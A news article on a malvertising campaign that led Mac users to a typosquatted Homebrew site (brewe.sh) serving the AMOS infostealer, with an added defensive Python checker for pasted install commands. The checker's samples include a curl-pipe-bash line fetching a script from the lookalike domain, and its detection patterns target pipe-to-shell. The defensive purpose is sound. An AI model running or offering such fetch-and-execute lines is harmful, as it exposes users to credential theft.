- Hackers Seen Running Malvertising Campaign Promoting Fake Homebrew Package
- Victims were infected with AMOS, a powerful information stealer.
- The campaign has since been removed, but users should still be on their guard.
Mac users are once again being targeted by powerful malware as attackers attempt to steal their login credentials, sensitive data, and cryptocurrency.
Software developer Ryan Chenkie spotted the malicious campaign on Google and noted that threat actors have been running malicious advertising campaigns on Google’s network promoting a fake version of Homebrew, an open source package manager for macOS and Linux.
“Developers, be careful when installing Homebrew,” he said. “Google offers sponsored links to a clone of a Homebrew site that has a cURL command for malware. The URL of this site is a different letter than the official site.”
Grabbing AMOS
The ad served on Google displays the correct Homebrew URL, brew.sh. Once the victim clicks it, however, they are redirected to brewe.sh, a lookalike domain with an extra letter "e" in the name. This is a common typosquatting technique, seen not only in malvertising but in other forms of cyberattack as well.
Victims who do not notice the swapped domain are prompted to install Homebrew by pasting a command shown on the page into the macOS Terminal or a Linux shell, mirroring the installation instructions on the legitimate Homebrew site.
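The lure works because the fake page copies the genuine "paste this one-liner into your terminal" flow, so the only visible difference is one letter in a hostname. The following script is an added example, not code from the article or from the Homebrew project: a pre-flight check that inspects a pasted install command before it is run, extracts every URL, verifies that each host is one the real installer is actually served from (the official one-liner fetches install.sh from the Homebrew/install repository on GitHub), flags hosts within a couple of edits of brew.sh or github.com as typosquat candidates, and notes when the fetched content would be piped straight into a shell. The allow-list, the edit-distance threshold of 2, and the malicious sample (a generic curl-pipe-bash line pointing at brewe.sh, constructed here and not the campaign's actual payload) are all assumptions of this example.

```python
import re
from urllib.parse import urlparse

# Hosts and path prefixes the genuine Homebrew installer is served from.
# Assumption of this example: the brew.sh one-liner fetches install.sh from
# the Homebrew/install repository on GitHub.
ALLOWED = {
    "brew.sh": "",
    "raw.githubusercontent.com": "/Homebrew/install/",
    "github.com": "/Homebrew/install/",
}
# Brands whose near-miss lookalikes are worth flagging.
BRANDS = ("brew.sh", "github.com", "githubusercontent.com")
MAX_TYPO_DISTANCE = 2  # assumption: 1-2 edits covers brewe.sh-style squats

URL_RE = re.compile(r"https?://[^\s\"'()<>|]+")
# "curl ... | bash", "| sudo sh", or bash -c "$(curl ...)" patterns.
PIPE_TO_SHELL_RE = re.compile(
    r"\|\s*(sudo\s+)?(ba|z|da)?sh\b|\b(ba|z)?sh\s+-c\s+[\"']\$\(\s*curl"
)


def edit_distance(a, b):
    """Levenshtein distance between two strings (standard DP, O(len(a)*len(b)))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host):
    """Crude eTLD+1: the last two labels, good enough for .sh/.com hosts here."""
    return ".".join(host.lower().split(".")[-2:])


def classify_host(host):
    """'allowed-brand' if the host is a brand or a subdomain of one,
    'lookalike:<brand>' if it is a typo-distance neighbour, else 'unknown'."""
    host = host.lower()
    for brand in BRANDS:
        if host == brand or host.endswith("." + brand):
            return "allowed-brand"
    base = registrable(host)
    for brand in BRANDS:
        if 0 < edit_distance(base, brand) <= MAX_TYPO_DISTANCE:
            return f"lookalike:{brand}"
    return "unknown"


def check_install_command(command):
    """Return (verdict, findings) for a pasted install one-liner.
    verdict is 'ok', 'suspicious' or 'no-remote-fetch'."""
    findings = []
    urls = URL_RE.findall(command)
    if not urls:
        return "no-remote-fetch", findings
    for url in urls:
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        kind = classify_host(host)
        if kind == "allowed-brand":
            prefix = ALLOWED.get(host)
            # Subdomains of a brand (gist.github.com, ...) and paths outside
            # the installer repo are still not the official installer.
            if prefix is None or not parsed.path.startswith(prefix):
                findings.append(f"{url}: {host} is not the Homebrew/install location")
        elif kind.startswith("lookalike:"):
            brand = kind.split(":", 1)[1]
            findings.append(f"{url}: {host} looks like {brand} (typosquat?)")
        else:
            findings.append(f"{url}: unknown host {host}")
    if findings and PIPE_TO_SHELL_RE.search(command):
        findings.append("fetched script is executed directly by a shell")
    return ("suspicious" if findings else "ok"), findings


if __name__ == "__main__":
    # Constructed samples: the real Homebrew one-liner and a generic
    # curl-pipe-bash line on the lookalike domain (not the campaign's payload).
    samples = [
        '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
        "curl -fsSL https://brewe.sh/install.sh | bash",
    ]
    for cmd in samples:
        verdict, notes = check_install_command(cmd)
        print(verdict, cmd)
        for note in notes:
            print("  -", note)
```

The check is deliberately conservative: anything outside the allow-list is reported, and a lookalike host is called out by name so the reader sees which brand is being imitated rather than a bare "unknown host". It does not replace reading the command yourself, but it catches exactly the one-letter swap this campaign relied on.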
But instead of getting the actual software, victims will receive AMOS, a popular information stealer that captures people’s passwords, browser data, cryptocurrency information, and more. Security researchers have been warning about AMOS (aka Atomic) for months, saying that the tool is offered on a subscription model for $1,000 a month.
Shortly after Chenkie posted his warning, Homebrew project leader Mike McQuaid replied that the campaign had already been taken down, but expressed frustration that it keeps recurring: “This seems removed now. There’s really little we can do about it, it keeps happening over and over again and Google seems to like taking money from scammers,” he said. “Please improve this and hopefully someone at Google will fix it for good.”
Via BleepingComputer